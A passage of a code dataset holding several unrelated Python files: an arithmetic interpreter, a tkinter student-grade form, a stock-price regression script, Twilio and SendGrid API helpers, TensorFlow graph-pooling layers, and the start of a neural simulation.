+{"seq_id":"636228375","text":"\"\"\"\n获取内容,分词,语法分析,生成部件,组合\n\n独立出一个移动指针向前的方法\n过滤空格的方法\n\n先分析语义,通过这一步去生成token\n然后在主要控制流,看token是否可以进行操作\n最后得到一个不可分解的因子就行了\n\n利用term这个方法加了一层,原本expr的作用就是去处理当前与下一个的关系,现在加了\n一层term,就类似递归,term也会去处理下一个与再下一个的关系,也通过while的条件\n约束来实现了类似优先级的效果\n\n这里解耦解得非常漂亮\n\nLexer --(Token)--> Parser --(AST)--> Interpreter\n通过Lexer生成token,然后通过parser将token作为一个个结点,构成树,最后解析器通过\n遍历树来得到结果\n\n\"\"\"\nINTEGER, EOF = 'integer', 'eof'\nPLUS, SUB, MUL, DIV = 'plus', 'sub', 'mul', 'div'\nLPARENT, RPARENT = '(', ')'\n\n\nclass Token:\n def __init__(self, type_, value):\n self.type = type_\n self.value = value\n\n def __str__(self):\n return 'Token({}, {})'.format(self.type, self.value)\n\n def __repr__(self):\n return self.__str__()\n\n\nclass Lexer:\n def __init__(self, text):\n self._text = text\n self._pos = 0\n self._current_char = self._text[self._pos]\n\n def error(self):\n raise Exception('Invalid Input')\n\n def advance(self):\n self._pos += 1\n if self._pos < len(self._text):\n self._current_char = self._text[self._pos]\n else:\n self._current_char = None\n\n def skip_whitespace(self):\n while self._current_char is not None and self._current_char.isspace():\n self.advance()\n\n def multi_number(self):\n _number = ''\n while self._current_char is not None and self._current_char.isdigit():\n _number += self._current_char\n self.advance()\n return int(_number)\n\n def get_next_token(self):\n while self._current_char is not None:\n self.skip_whitespace()\n\n if self._current_char.isdigit():\n return Token(INTEGER, self.multi_number())\n\n if self._current_char == '+':\n self.advance() # 注意这里是要移动指针的\n return Token(PLUS, '+')\n\n if self._current_char == '-':\n self.advance()\n return Token(SUB, '-')\n\n if self._current_char == '*':\n self.advance()\n return Token(MUL, '*')\n\n if self._current_char == '/':\n self.advance()\n return Token(DIV, '/')\n\n if self._current_char == '(':\n self.advance()\n return Token(LPARENT, '(')\n\n if self._current_char == ')':\n self.advance()\n return Token(RPARENT, ')')\n\n self.error()\n\n return Token(EOF, None)\n\n\nclass AST:\n pass\n\n\nclass UnaryOp(AST): # 一元操作符,作用是让数字为正或负\n def __init__(self, op, expr):\n self.token = self.op = op\n self.expr = expr\n\n\nclass BinOp(AST):\n def __init__(self, left, op, right):\n self.left = left\n self.token = self.op = op\n self.right = right\n\n\nclass Num(AST):\n def __init__(self, token):\n self.token = token\n self.value = token.value\n\n\nclass Parser:\n def __init__(self, lexer):\n self._lexer = lexer\n self._current_token = self._lexer.get_next_token()\n\n def error(self):\n raise Exception('interpreter error')\n\n def eat(self, token_type): # 处理完当前token,向下走\n if self._current_token.type == token_type:\n self._current_token = self._lexer.get_next_token()\n else:\n self.error()\n\n def factor(self):\n _token = self._current_token\n\n if _token.type == PLUS:\n self.eat(PLUS)\n _node = UnaryOp(_token, self.factor())\n return _node\n elif _token.type == SUB:\n self.eat(SUB)\n _node = UnaryOp(_token, self.factor())\n return _node\n\n if _token.type == INTEGER:\n self.eat(INTEGER)\n return Num(_token)\n elif _token.type == LPARENT:\n self.eat(LPARENT)\n _node = self.expr() # 递归调用\n self.eat(RPARENT)\n return _node\n\n @staticmethod\n def construct_node(left, op, right):\n return BinOp(left=left, op=op, right=right)\n\n def term(self):\n _node = self.factor()\n while self._current_token.type in (MUL, DIV):\n _op = self._current_token\n if _op.value == '*':\n self.eat(MUL)\n elif _op.value == '/':\n self.eat(DIV)\n\n _node = self.construct_node(left=_node, op=_op, right=self.factor()) # 主要是通过这步生成子树,然后递归结合起来生成语法树\n return _node\n\n def expr(self):\n _node = self.term()\n while self._current_token.type in (PLUS, SUB):\n _op = self._current_token\n if _op.value == '+':\n self.eat(PLUS)\n elif _op.value == '-':\n self.eat(SUB)\n\n _node = self.construct_node(left=_node, op=_op, right=self.term())\n return _node\n\n def parse(self):\n return self.expr()\n\n\nclass NodeVisitor:\n def generic_visit(self, node):\n raise Exception('No visit_{} method'.format(type(node).__name__))\n\n def visit(self, node): # 类似适配器,根据不同的method_name去选择不同的方法\n method_name = 'visit_' + type(node).__name__\n visitor = getattr(self, method_name, self.generic_visit)\n return visitor(node)\n\n\nclass Interpreter(NodeVisitor):\n def __init__(self, parser):\n self._parser = parser\n\n def visit_UnaryOp(self, node):\n op = node.op.type\n if op == PLUS:\n return +self.visit(node.expr)\n elif op == SUB:\n return -self.visit(node.expr) # 单纯地取相反数而已\n\n def visit_BinOp(self, node): # 定义了具体的操作方法\n if node.op.type == PLUS:\n return self.visit(node.left) + self.visit(node.right)\n elif node.op.type == SUB:\n return self.visit(node.left) - self.visit(node.right)\n elif node.op.type == MUL:\n return self.visit(node.left) * self.visit(node.right)\n elif node.op.type == DIV:\n return self.visit(node.left) / self.visit(node.right)\n\n def visit_Num(self, node):\n return node.value\n\n def interpret(self):\n tree = self._parser.parse() # 拿到的是树的根结点\n return self.visit(tree)\n\n\nclass RPNTranslator(NodeVisitor):\n def __init__(self, tree):\n self.tree = tree\n\n def visit_BinOp(self, node):\n left_val = self.visit(node.left)\n right_val = self.visit(node.right)\n return '{left} {right} {op}'.format(\n left=left_val, right=right_val, op=node.op.value\n )\n\n def visit_Num(self, node):\n return node.value\n\n def translate(self):\n return self.visit(self.tree)\n\n\nclass LISPTranslator(RPNTranslator):\n def visit_BinOp(self, node):\n left_val = self.visit(node.left)\n right_val = self.visit(node.right)\n return '{op} {left} {right}'.format(\n left=left_val, right=right_val, op=node.op.value\n )\n\n\ndef main():\n try:\n while True:\n try:\n text = input('spi> ')\n except EOFError:\n break\n if not text:\n continue\n lexer = Lexer(text)\n parser = Parser(lexer)\n interpreter = Interpreter(parser)\n result = interpreter.interpret()\n print(result)\n except KeyboardInterrupt:\n print('\\nbye~')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"about_pascal/ast2.py","file_name":"ast2.py","file_ext":"py","file_size_in_byte":7892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"446099227","text":"from tkinter import *\nfrom tkinter import messagebox, Tk\n\nname_list = []\ntest1_score_list = []\ntest2_score_list = []\ntest3_score_list = []\nstudent_average_score = []\nstudent_total_score = []\n\nif name_list is []:\n class_average = 0\nelse:\n class_average = int(sum(test1_score_list) + sum(test2_score_list) + sum(test3_score_list) / len(name_list))\n\nconverted_test_1_score = None\nconverted_test_2_score = None\nconverted_test_3_score = None\nstudent_name = None\n\nadd_student_window = Tk()\nadd_student_window.withdraw()\ndef add_student():\n add_student_window.deiconify()\n def forgetall():\n out_of_scale_error1.grid_forget()\n out_of_scale_error2.grid_forget()\n out_of_scale_error3.grid_forget()\n\n invalid_input_error1.grid_forget()\n invalid_input_error2.grid_forget()\n invalid_input_error3.grid_forget()\n invalid_input_error4.grid_forget()\n invalid_input_error5.grid_forget()\n\n def cancel():\n return\n\n def submit():\n\n student_first_name = student_first_name_temp.get()\n student_surname_name = student_surname_name_temp.get()\n test_1_score = test_1_score_temp.get()\n test_2_score = test_2_score_temp.get()\n test_3_score = test_3_score_temp.get()\n\n forgetall()\n\n student_first_name_validation = student_first_name.isalpha()\n student_surname_name_validation = student_surname_name.isalpha()\n\n if student_first_name_validation is False:\n invalid_input_error4.grid(row=0, column=4)\n error1 = True\n else:\n error1 = None\n\n if student_surname_name_validation is False:\n invalid_input_error5.grid(row=1, column=4)\n error5 = True\n else:\n error5 = None\n\n try:\n converted_test_1_score = int(test_1_score)\n except ValueError:\n invalid_input_error1.grid(row=2, column=4)\n error2 = True\n else:\n if converted_test_1_score > 20:\n out_of_scale_error1.grid(row=2, column=4)\n error2 = True\n elif converted_test_1_score <= 0:\n out_of_scale_error1.grid(row=2, column=4)\n error2 = True\n else:\n out_of_scale_error1.grid_forget()\n invalid_input_error1.grid_forget()\n error2 = None\n\n try:\n converted_test_2_score = int(test_2_score)\n except ValueError:\n invalid_input_error2.grid(row=3, column=4)\n error3 = True\n else:\n if converted_test_2_score > 25:\n out_of_scale_error2.grid(row=3, column=4)\n error3 = True\n elif converted_test_2_score < 0:\n out_of_scale_error2.grid(row=3, column=4)\n error3 = True\n else:\n out_of_scale_error2.grid_forget()\n invalid_input_error2.grid_forget()\n error3 = None\n\n try:\n converted_test_3_score = int(test_3_score)\n except ValueError:\n invalid_input_error3.grid(row=4, column=4)\n error4 = True\n else:\n if converted_test_3_score > 35:\n out_of_scale_error3.grid(row=4, column=4)\n error4 = True\n elif converted_test_3_score < 0:\n out_of_scale_error3.grid(row=4, column=4)\n error4 = True\n else:\n out_of_scale_error3.grid_forget()\n invalid_input_error3.grid_forget()\n error4 = None\n\n if error1 is None:\n if error2 is None:\n if error3 is None:\n if error4 is None:\n if error5 is None:\n send()\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n\n def send():\n submit_button_action = messagebox.askyesno(title='save', message='Are you happy with what you have entered?')\n if submit_button_action > 0:\n name_list.append(student_name)\n test1_score_list.append(converted_test_1_score)\n test2_score_list.append(converted_test_2_score)\n test3_score_list.append(converted_test_3_score)\n\n print('Saved')\n add_student_window.destroy()\n\n\n student_first_name_temp = StringVar()\n student_surname_name_temp = StringVar()\n test_1_score_temp = StringVar()\n test_2_score_temp = StringVar()\n test_3_score_temp = StringVar()\n\n out_of_scale_error1 = Label(add_student_window, text='Mark Invalid', fg='red')\n out_of_scale_error2 = Label(add_student_window, text='Mark Invalid', fg='red')\n out_of_scale_error3 = Label(add_student_window, text='Mark Invalid', fg='red')\n\n # error. invalid input\n\n invalid_input_error1 = Label(add_student_window, text='please enter a valid number', fg='red')\n invalid_input_error2 = Label(add_student_window, text='please enter a valid number', fg='red')\n invalid_input_error3 = Label(add_student_window, text='please enter a valid number', fg='red')\n invalid_input_error4 = Label(add_student_window, text='please enter a valid first name', fg='red')\n invalid_input_error5 = Label(add_student_window, text='please enter a valid surname', fg='red')\n\n enter_first_name_label = Label(add_student_window, text='First Name')\n enter_surname_name_label = Label(add_student_window, text='Surname Name')\n test_1_score_label = Label(add_student_window, text='Test 1 Score')\n test_2_score_label = Label(add_student_window, text='Test 2 Score')\n test_3_score_label = Label(add_student_window, text='Test 3 Score')\n\n out_of_20_marks_label = Label(add_student_window, text='/20 Marks')\n out_of_25_marks_label = Label(add_student_window, text='/25 Marks')\n out_of_35_marks_label = Label(add_student_window, text='/35 Marks')\n\n student_first_name_entry = Entry(add_student_window, textvariable=student_first_name_temp)\n student_surname_name_entry = Entry(add_student_window, textvariable=student_surname_name_temp)\n test_1_score_entry = Entry(add_student_window, textvariable=test_1_score_temp)\n test_2_score_entry = Entry(add_student_window, textvariable=test_2_score_temp)\n test_3_score_entry = Entry(add_student_window, textvariable=test_3_score_temp)\n\n submit_button = Button(add_student_window, text='Submit', command=submit)\n cancel_button = Button(add_student_window, text='Cancel', command=cancel)\n\n enter_first_name_label.grid(row=0, column=0)\n enter_surname_name_label.grid(row=1, column=0)\n test_1_score_label.grid(row=2, column=0)\n test_2_score_label.grid(row=3, column=0)\n test_3_score_label.grid(row=4, column=0)\n\n student_first_name_entry.grid(row=0, column=1)\n student_surname_name_entry.grid(row=1, column=1)\n test_1_score_entry.grid(row=2, column=1)\n test_2_score_entry.grid(row=3, column=1)\n test_3_score_entry.grid(row=4, column=1)\n\n out_of_20_marks_label.grid(row=2, column=2)\n out_of_25_marks_label.grid(row=3, column=2)\n out_of_35_marks_label.grid(row=4, column=2)\n\n submit_button.grid(row=5, column=0)\n cancel_button.grid(row=5, column=1)\n\n add_student_window.mainloop()\n\n\n\n\n\ndef fix_score():\n student_average_score = []\n student_total_score = []\n student_count = len(name_list)\n list_count_average = 0\n list_count_total = 0\n if name_list == []:\n pass\n else:\n while True:\n if list_count_total < student_count:\n test1 = int(test1_score_list[list_count_total])\n test2 = int(test2_score_list[list_count_total])\n test3 = int(test3_score_list[list_count_total])\n student_total = test1 + test2 + test3\n student_total_score.append(student_total)\n list_count_total = list_count_total + 1\n else:\n break\n\n while True:\n if list_count_average < student_count:\n test1 = int(test1_score_list[list_count_average])\n test2 = int(test2_score_list[list_count_average])\n test3 = int(test3_score_list[list_count_average])\n test_average_score = int(test1 + test2 + test3 / 3)\n student_average_score.append(test_average_score)\n list_count_average = list_count_average + 1\n else:\n break\n\n if name_list == []:\n pass\n else:\n max_total = max(student_total_score)\n max_total_possition = student_total_score.index(max_total)\n best_student.grid(row=3, column=0)\n\ndef refresh():\n total_student_label.forget()\n total_student_label\n average_class_mark_label.forget()\n average_class_mark_label\n best_student.forget()\n best_student\n\n\n\nmain = Tk()\ntotal_student_label = Label(main, text='Student count: %s' % (len(name_list)), fg='green')\naverage_class_mark_label = Label(main, text='Average class mark: %s' % class_average, fg='blue')\nbest_student = Label(main, text='%s currently has the highest score with %s marks' % (name_list[max_total_possition], student_total_score[max_total_possition]), fg='red')\n\ntotal_student_label.grid(row=0, column=0)\naverage_class_mark_label.grid(row=1, column=0)\nbutton = Button(main, text='button', command=refresh)\nbutton.grid(row=2, column=0)\n\nfix_score()\n\n\nadd_student()\n\n","sub_path":"Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"438479572","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import skew\r\nfrom sklearn.ensemble import AdaBoostRegressor\r\nfrom pyearth import Earth\r\nfrom sklearn.metrics import mean_squared_error, r2_score\r\nimport talib\r\n\r\ntrain = pd.read_csv('AAPL5_train.csv') # 5-minute Apple data\r\ntest = pd.read_csv('AAPL5_test.csv')\r\n\r\n# Preprocess: remove unnecessary columns\r\ncols = list(train)[4:9]\r\ntrain = train[cols].astype(str)\r\n\r\nfor i in cols:\r\n for j in range(0,len(train)):\r\n train[i][j] = train[i][j].replace(\",\",\"\")\r\n \r\ntrain = train.astype(float)\r\n\r\nHT = talib.HT_DCPERIOD(train[''])\r\nstd = talib.STDDEV(train[''], timeperiod=7, nbdev=1)\r\n\r\nHT = pd.DataFrame(data={'HT_DCPERIOD':HT})\r\nstd = pd.DataFrame(data={'STDDEV':std})\r\n\r\ntrain = train.join(HT)\r\ntrain = train.join(std)\r\n\r\navgHT1 = train['HT_DCPERIOD'].mean()\r\navgSTD = train[\"STDDEV\"].mean()\r\n\r\ntrain['HT_DCPERIOD'].fillna(avgHT1, inplace=True)\r\ntrain['STDDEV'].fillna(avgSTD, inplace=True)\r\n\r\n# transform data using log(1+x)\r\ntrain[''] = np.log1p(train['']) \r\ny = train['']\r\nx = train\r\ndel x['']\r\ndel x['']\r\ndel x['']\r\ndel x['']\r\n\r\nnumeric_feats = x.dtypes[x.dtypes != \"object\"].index\r\nskewed_feats = train[numeric_feats].apply(lambda g: skew(g.dropna())) \r\nskewed_feats = skewed_feats.index \r\n\r\nx[skewed_feats] = np.log1p(x[skewed_feats])\r\n\r\n# Fit MARS\r\nmars = Earth(allow_missing=True)\r\nmars.fit(x,y)\r\nprint(mars.trace())\r\nprint(mars.summary())\r\n\r\ndef inverse(x):\r\n x = np.exp(x) - 1\r\n return x\r\n\r\ndef graph(x, y, y2, a, b, Title):\r\n fig = plt.figure()\r\n plt.plot(x[a:b],y[a:b],'r', label='Actual')\r\n plt.plot(x[a:b],y2[a:b],'b', label='Predicted')\r\n plt.xlabel('x')\r\n plt.ylabel('y')\r\n plt.title(Title)\r\n plt.legend(loc='upper left')\r\n plt.show()\r\n return fig\r\n\r\n# Predict training series\r\ny_hat = mars.predict(x)\r\nx_train = list(range(0,len(y)))\r\n\r\n# Process test data\r\ntest = test[cols].astype(str)\r\nfor i in cols:\r\n for j in range(0,len(test)):\r\n test[i][j] = test[i][j].replace(\",\",\"\")\r\n \r\ntest = test.astype(float)\r\n\r\nHT = talib.HT_DCPERIOD(test[''])\r\nstd = talib.STDDEV(test[''], timeperiod=7, nbdev=1)\r\n\r\nHT = pd.DataFrame(data={'HT_DCPERIOD':HT})\r\nstd = pd.DataFrame(data={'STDDEV':std})\r\n\r\ntest = test.join(HT)\r\ntest = test.join(std)\r\n\r\navgHT1 = test['HT_DCPERIOD'].mean()\r\navgSTD = test[\"STDDEV\"].mean()\r\n\r\ntest['HT_DCPERIOD'].fillna(avgHT1, inplace=True)\r\ntest['STDDEV'].fillna(avgSTD, inplace=True)\r\n\r\ntest[''] = np.log1p(test['']) \r\ny1 = test['']\r\n#x1 = test.drop('',1)\r\nx1 = test\r\ndel x1['']\r\ndel x1['']\r\ndel x1['']\r\ndel x1['']\r\n\r\nfeatures = x1.dtypes[x1.dtypes != \"object\"].index\r\nfeatures_skewed = test[features].apply(lambda g: skew(g.dropna())) \r\nfeatures_skewed = features_skewed.index \r\nx1[features_skewed] = np.log1p(x1[features_skewed])\r\n\r\n# Predict Test series\r\ny_hat1 = mars.predict(x1)\r\nx_test = list(range(0, len(y1)))\r\n\r\n# Adaboost MARS\r\nboosted_mars = AdaBoostRegressor(base_estimator=mars, n_estimators=25, learning_rate=0.1, loss=\"exponential\")\r\nboosted_mars.fit(x,y)\r\n\r\n# Predict using boosted MARS\r\nyb = boosted_mars.predict(x)\r\nyb1 = boosted_mars.predict(x1)\r\n\r\n# Graphs of test/train\r\ngraph(x_train, inverse(y), inverse(y_hat), 5000, 5100, Title='MARS: Train').savefig('MARS1.png') # smaller window for visualization\r\ngraph(x_test, inverse(y1), inverse(y_hat1), 150, 250, Title='MARS: Test').savefig('MARS2.png')\r\ngraph(x_train, inverse(y), inverse(yb), 5000, 5100, Title='Adaboost MARS: Train').savefig('AB1.png') # same window boosted\r\ngraph(x_test, inverse(y1), inverse(yb1), 150, 250, Title='Adaboost MARS: Test').savefig('AB2.png')\r\n\r\n# Mean Squared Error on each case\r\nMSE1 = mean_squared_error(inverse(y), inverse(y_hat))\r\nMSE2 = mean_squared_error(inverse(y1), inverse(y_hat1))\r\nMSEB1 = mean_squared_error(inverse(y), inverse(yb))\r\nMSEB2 = mean_squared_error(inverse(y1), inverse(yb1))\r\n\r\n# R-squared\r\nR1 = r2_score(inverse(y), inverse(y_hat))\r\nR2 = r2_score(inverse(y1), inverse(y_hat1))\r\nR3 = r2_score(inverse(y), inverse(yb))\r\nR4 = r2_score(inverse(y1), inverse(yb1))\r\n\r\n# S-Statistic\r\nS1 = pd.DataFrame(((pd.DataFrame(inverse(y)).values - (pd.DataFrame(inverse(y_hat))).values)**2))\r\nS11 = np.sqrt((S1.sum(axis=0))/len(y))\r\n\r\nS2 = pd.DataFrame(((pd.DataFrame(inverse(y1)).values - (pd.DataFrame(inverse(y_hat1))).values)**2))\r\nS21 = np.sqrt((S2.sum(axis=0))/len(y1))\r\n\r\nS3 = pd.DataFrame(((pd.DataFrame(inverse(y)).values - (pd.DataFrame(inverse(yb))).values)**2))\r\nS31 = np.sqrt((S3.sum(axis=0))/len(y))\r\n\r\nS4 = pd.DataFrame(((pd.DataFrame(inverse(y1)).values - (pd.DataFrame(inverse(yb1))).values)**2))\r\nS41 = np.sqrt((S4.sum(axis=0))/len(y1))\r\n\r\nimport plotly\r\nimport plotly.graph_objs as go\r\nplotly.offline.init_notebook_mode(connected=True)\r\n\r\ntrace = go.Table(\r\n columnwidth=[72, 115, 115, 115],\r\n header=dict(values=['Type', 'MSE', 'R-Squared', 'SE of Estimate'], align=['left']*5),\r\n cells=dict(values=[['In Sample', 'Out Sample', 'In Sample (boosted)', 'Out Sample (boosted)'],\r\n [MSE1, MSE2, MSEB1, MSEB2], [R1, R2, R3, R4], [S11, S21, S31, S41]],align=['left']*5))\r\n\r\ndata = [trace] \r\nplotly.offline.plot(data, filename = 'basic_table.html')\r\n","sub_path":"MARS.py","file_name":"MARS.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"495523924","text":"# Download the Python helper library from twilio.com/docs/python/install\nimport os\nfrom twilio.rest import Client\n\n# Your Account Sid and Auth Token from twilio.com/user/account\n# To set up environmental variables, see http://twil.io/secure\naccount_sid = os.environ['TWILIO_ACCOUNT_SID']\nauth_token = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\nfeedback = client.calls(\"CAe03b7cd806070d1f32bdb7f1046a41c0\") \\\n .feedback() \\\n .fetch()\n\nprint(feedback.date_created)\n","sub_path":"rest/call-feedback/instance-get-example-1/instance-get-example-1.8.x.py","file_name":"instance-get-example-1.8.x.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"220675355","text":"import sendgrid\nfrom django.conf import settings\nfrom sendgrid.helpers.mail import *\n\n\ndef send_email_to_account(from_email, to_email, subject, message):\n sender = Email(from_email)\n receiver = Email(to_email)\n sg = sendgrid.SendGridAPIClient(apikey=settings.SENDGRID_API_KEY)\n content = Content(\"text/html\", message)\n mail = Mail(sender, subject, receiver, content)\n response = sg.client.mail.send.post(request_body=mail.get())\n\n\n\n","sub_path":"compliance_linc/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"299864945","text":"import numpy as np\r\nimport tensorflow as tf\r\n\r\nfrom tensorflow.python.ops import nn_ops\r\nfrom Layer.LayerObject import LayerObject\r\nfrom Model.utils_model import load_initial_value\r\n\r\n\r\nclass EdgeToCluster(LayerObject):\r\n \"\"\"\r\n\r\n \"\"\"\r\n required_pa = ['kernel_shape']\r\n\r\n def __init__(self,\r\n arguments: dict,\r\n parameters: dict = None,\r\n ):\r\n LayerObject.__init__(self)\r\n self.optional_pa.update({'L2_lambda': 5e-3,\r\n 'bias': True,\r\n 'batch_normalization': False,\r\n 'activation': None,\r\n 'strides': [1, 1, 1, 1],\r\n 'padding': 'VALID',\r\n 'scope': 'E2C',\r\n 'conv_fun': tf.nn.conv2d,\r\n 'use_bias': True,\r\n })\r\n self.tensors = {}\r\n\r\n self.parameters = self.set_parameters(arguments=arguments,\r\n parameters=parameters)\r\n # Cluster kernel\r\n [width, height, in_channels, out_channels] = self.parameters['kernel_shape']\r\n kernel_shape_row = [1, height, in_channels, 1]\r\n self.weight_row = tf.Variable(initial_value=self.get_initial_weight(kernel_shape=kernel_shape_row),\r\n name=self.parameters['scope'] + '/kernel_row',\r\n )\r\n self.tensors['weight_row'] = self.weight_row\r\n L2_weight_row = tf.contrib.layers.l2_regularizer(self.parameters['L2_lambda'])(self.weight_row)\r\n tf.add_to_collection('L2_loss', L2_weight_row)\r\n\r\n kernel_shape_col = [width, 1, 1, out_channels]\r\n self.weight_col = tf.Variable(initial_value=self.get_initial_weight(kernel_shape=kernel_shape_col),\r\n name=self.parameters['scope'] + '/kernel_col')\r\n self.tensors['weight_col'] = self.weight_col\r\n L2_weight_col = tf.contrib.layers.l2_regularizer(self.parameters['L2_lambda'])(self.weight_col)\r\n tf.add_to_collection('L2_loss', L2_weight_col)\r\n\r\n # build bias\r\n out_channels = self.parameters['kernel_shape'][-1]\r\n\r\n if self.parameters['bias']:\r\n initializer = tf.constant(0.0, shape=[out_channels, ])\r\n if self.parameters['load_bias']:\r\n initializer = load_initial_value(type='bias',\r\n name=self.parameters['scope'])\r\n\r\n self.bias = tf.Variable(initial_value=initializer,\r\n name=self.parameters['scope'] + '/bias',\r\n )\r\n self.tensors['bias'] = self.bias\r\n\r\n def build(self, *args, **kwargs):\r\n # Get adjacency matrix from inputs, which should be a Tensor or a dictionary\r\n adjacency_matrix = kwargs['input_tensor'] if 'input_tensor' in kwargs else kwargs['adjacency_matrix']\r\n self.tensors['input'] = adjacency_matrix\r\n self.tensors['adjacency_matrix'] = adjacency_matrix\r\n\r\n [_, _, num_nodes, _] = adjacency_matrix.shape.as_list()\r\n\r\n # Cluster adjacency matrix calculation\r\n neighbour_vectors = tf.split(tf.abs(adjacency_matrix), num_or_size_splits=num_nodes, axis=2)\r\n\r\n node_features = []\r\n cluster_adjacency_list = []\r\n for neighbour_vector in neighbour_vectors:\r\n cross_multiply = tf.transpose(tf.matmul(tf.transpose(neighbour_vector, perm=[0, 3, 1, 2]),\r\n tf.transpose(neighbour_vector, perm=[0, 3, 2, 1])),\r\n perm=[0, 2, 3, 1])\r\n cluster_adjacency = tf.multiply(adjacency_matrix, cross_multiply)\r\n cluster_adjacency_list.append(cluster_adjacency)\r\n node_feature_row = self.parameters['conv_fun'](input=cluster_adjacency,\r\n filter=self.weight_row,\r\n strides=self.parameters['strides'],\r\n padding=self.parameters['padding'])\r\n node_feature = self.parameters['conv_fun'](input=node_feature_row,\r\n filter=self.weight_col,\r\n strides=self.parameters['strides'],\r\n padding=self.parameters['padding'])\r\n if self.parameters['use_bias']:\r\n node_feature = tf.nn.bias_add(node_feature, self.bias)\r\n node_features.append(node_feature)\r\n node_features = tf.concat(node_features, axis=-2)\r\n node_features = tf.squeeze(node_features, axis=-3)\r\n self.tensors['cluster_adjacency'] = cluster_adjacency_list\r\n\r\n if self.parameters['activation']:\r\n node_features = self.parameters['activation'](node_features)\r\n\r\n self.tensors['node_features'] = node_features\r\n\r\n\r\nclass SelfAttentionGraphPooling(LayerObject):\r\n \"\"\"\r\n\r\n \"\"\"\r\n required_pa = ['kernel_shape']\r\n\r\n def __init__(self,\r\n arguments: dict,\r\n parameters: dict = None,\r\n ):\r\n LayerObject.__init__(self)\r\n self.optional_pa.update({'L2_lambda': 5e-3,\r\n 'activation': None,\r\n 'scope': 'SAGPool',\r\n })\r\n self.tensors = {}\r\n self.parameters = self.set_parameters(arguments=arguments,\r\n parameters=parameters)\r\n\r\n # Attention kernel\r\n initializer_att = self.get_initial_weight(kernel_shape=self.parameters['kernel_shape'])\r\n self.weight_att = tf.Variable(initial_value=initializer_att,\r\n name=self.parameters['scope'] + '/kernel',\r\n )\r\n self.tensors['weight_att'] = self.weight_att\r\n L2_att = tf.contrib.layers.l2_regularizer(self.parameters['L2_lambda'])(self.weight_att)\r\n tf.add_to_collection('L2_loss', L2_att)\r\n\r\n def build(self, *args, **kwargs):\r\n node_features = kwargs['node_features']\r\n adjacency_matrix = kwargs['adjacency_matrix']\r\n self.tensors['input'] = adjacency_matrix\r\n\r\n [_, _, num_nodes, _] = adjacency_matrix.shape.as_list()\r\n\r\n # Self-attention graph pooling\r\n adjacency_matrix = tf.squeeze(adjacency_matrix, axis=-1)\r\n y = tf.matmul(adjacency_matrix, node_features)\r\n cluster_mapping = tf.matmul(tf.reshape(y,\r\n shape=[-1, self.parameters['kernel_shape'][0]]),\r\n self.weight_att)\r\n\r\n if self.parameters['activation']:\r\n cluster_mapping = self.parameters['activation'](cluster_mapping)\r\n\r\n cluster_mapping = tf.reshape(cluster_mapping, shape=[-1, num_nodes, self.parameters['kernel_shape'][-1]])\r\n cluster_mapping = tf.nn.softmax(cluster_mapping, axis=-1)\r\n self.tensors['cluster_mapping'] = cluster_mapping\r\n\r\n self.add_loss_function()\r\n\r\n adjacency_matrix = tf.matmul(tf.matmul(a=tf.transpose(cluster_mapping, perm=[0, 2, 1]),\r\n b=adjacency_matrix),\r\n b=cluster_mapping)\r\n adjacency_matrix = tf.expand_dims(adjacency_matrix, axis=-1)\r\n node_features = tf.matmul(tf.transpose(cluster_mapping, perm=[0, 2, 1]),\r\n node_features)\r\n self.tensors['node_features'] = node_features\r\n self.tensors['adjacency_matrix'] = adjacency_matrix\r\n\r\n self.tensors['output'] = node_features\r\n return adjacency_matrix\r\n\r\n def add_loss_function(self):\r\n adjacency_matrix = self.tensors['input']\r\n cluster_mapping = self.tensors['cluster_mapping']\r\n\r\n link_loss = tf.squeeze(adjacency_matrix, axis=-1) - \\\r\n tf.matmul(cluster_mapping, tf.transpose(cluster_mapping, perm=[0, 2, 1]))\r\n link_loss = tf.norm(link_loss, ord='fro', axis=[1, 2])\r\n\r\n EPS = 1e-30\r\n\r\n entropy_loss = tf.reduce_mean(tf.reduce_sum(-tf.multiply(cluster_mapping,\r\n tf.log(cluster_mapping + EPS)), axis=-1))\r\n\r\n loss = link_loss + entropy_loss\r\n tf.add_to_collection('Mapping_loss', loss)\r\n","sub_path":"Layer/CNNSmallWorld.py","file_name":"CNNSmallWorld.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"79935290","text":"import numpy as np\nimport scipy.ndimage\n#import pyaudio\nimport time\nimport matplotlib\nimport keyboard\nfrom pynput.keyboard import Key, Controller\n#import cv2\nimport matplotlib.pyplot as plt\nfrom mss import mss\nfrom PIL import Image\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nclass Mind:\n def __init__(self, exec, init_gamma):\n self.neurons = np.random.uniform(size=(count, dims))\n self.neurons[-1][-output_count:] = 0.7\n visual_map = np.mgrid[0.3:0.7:pixels * 1j, 0.3:0.7:pixels * 1j, 0.2:0.4:channels * 1j]\n visual_map = visual_map.reshape(dims, -1).T\n self.neurons[:pixels ** 2 * channels] = visual_map\n self.dists = np.sqrt(np.mean(np.square(self.neurons[None, :, :] - self.neurons[:, None, :]), axis=-1))\n self.firings = np.random.binomial(size=(firing_history, count), n=1, p=0.5)\n self.connections = (\n (self.dists > 0) *\n (self.dists < np.percentile(self.dists, percentile)) *\n np.random.uniform(size=self.dists.shape, low=-2, high=2)\n )\n self.plastic = np.ones_like(self.connections)\n # Disable connections coming into the sensory neurons\n self.connections[:, :sensory_count] = 0\n self.plastic[self.connections == 0] = 0\n # Disable connections coming out of the sensory neurons\n # self.connections[-output_count:, :] = 0\n self.gamma = init_gamma\n self.exec = exec\n self.lr_decay = 0.9999\n self.acc_decay = 